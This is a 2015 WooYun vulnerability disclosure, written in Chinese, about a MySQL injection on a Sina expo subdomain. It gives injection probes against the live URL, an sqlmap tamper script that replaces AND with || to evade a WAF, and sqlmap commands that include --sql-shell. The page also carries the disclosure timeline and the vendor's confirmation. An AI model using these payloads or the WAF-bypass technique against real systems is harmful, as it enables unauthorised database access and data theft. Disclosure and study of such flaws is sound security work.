当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092516

漏洞标题:新浪某分站MySQL注射(附绕过小脚本一份)

相关厂商:新浪

漏洞作者: kttzd

提交时间:2015-01-18 13:06

修复时间:2015-03-04 13:08

公开时间:2015-03-04 13:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-18: 细节已通知厂商并且等待厂商处理中
2015-01-19: 厂商已经确认,细节仅向厂商公开
2015-01-29: 细节向核心白帽子及相关领域专家公开
2015-02-08: 细节向普通白帽子公开
2015-02-18: 细节向实习白帽子公开
2015-03-04: 细节向公众公开

简要描述:

注入

详细说明:

站点
v2.expo2013.city.sina.com.cn
问题url
http://v2.expo2013.city.sina.com.cn/s/pnlink.php?id=12473&typeid=69
手动测试
http://v2.expo2013.city.sina.com.cn/s/pnlink.php?id=12473&typeid=69 order by 1--
http://v2.expo2013.city.sina.com.cn/s/pnlink.php?id=12473&typeid=69/1
http://v2.expo2013.city.sina.com.cn/s/pnlink.php?id=12473&typeid=69-1
可以初步确认是注入,然后测试语句发现有waf。但是发现过滤的不全
测试
http://v2.expo2013.city.sina.com.cn/s/pnlink.php?id=12473&typeid=69 and Length((database()))=11
绕过 and or =关键词
将and关键词替换为|| (sqlmap用的tamper脚本)

#!/usr/bin/env python
"""
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
pass
def tamper(payload, **kwargs):
"""

>>> tamper('-1 AND 1=1')
'-1 || 1=1'
"""
return payload.replace("AND", "||") if payload else payload


将脚本放到sqlmap目录的tamper中并保存为test.py
注入
sqlmap -u "http://v2.expo2013.city.sina.com.cn/s/pnlink.php?id=12473&typeid=69" -tamper "test.py"

漏洞证明:

新浪.png


sqlmap -u "http://v2.expo2013.city.sina.com.cn/s/pnlink.php?id=12473&typeid=69" -tamper "test.py" --sql-shell

新浪02.png


点到为止

修复方案:

你们更懂

版权声明:转载请注明来源 kttzd@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-01-19 11:46

厂商回复:

感谢关注新浪安全,漏洞正在修复中。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-04 13:09 | Melody ( 路人 | Rank:5 漏洞数:3 | 啊)

    看下,

  2. 2015-08-11 13:16 | Manning ( 普通白帽子 | Rank:559 漏洞数:46 | 就恨自己服务器太少)

    mysql怎么能这么玩呢?||是什么梗?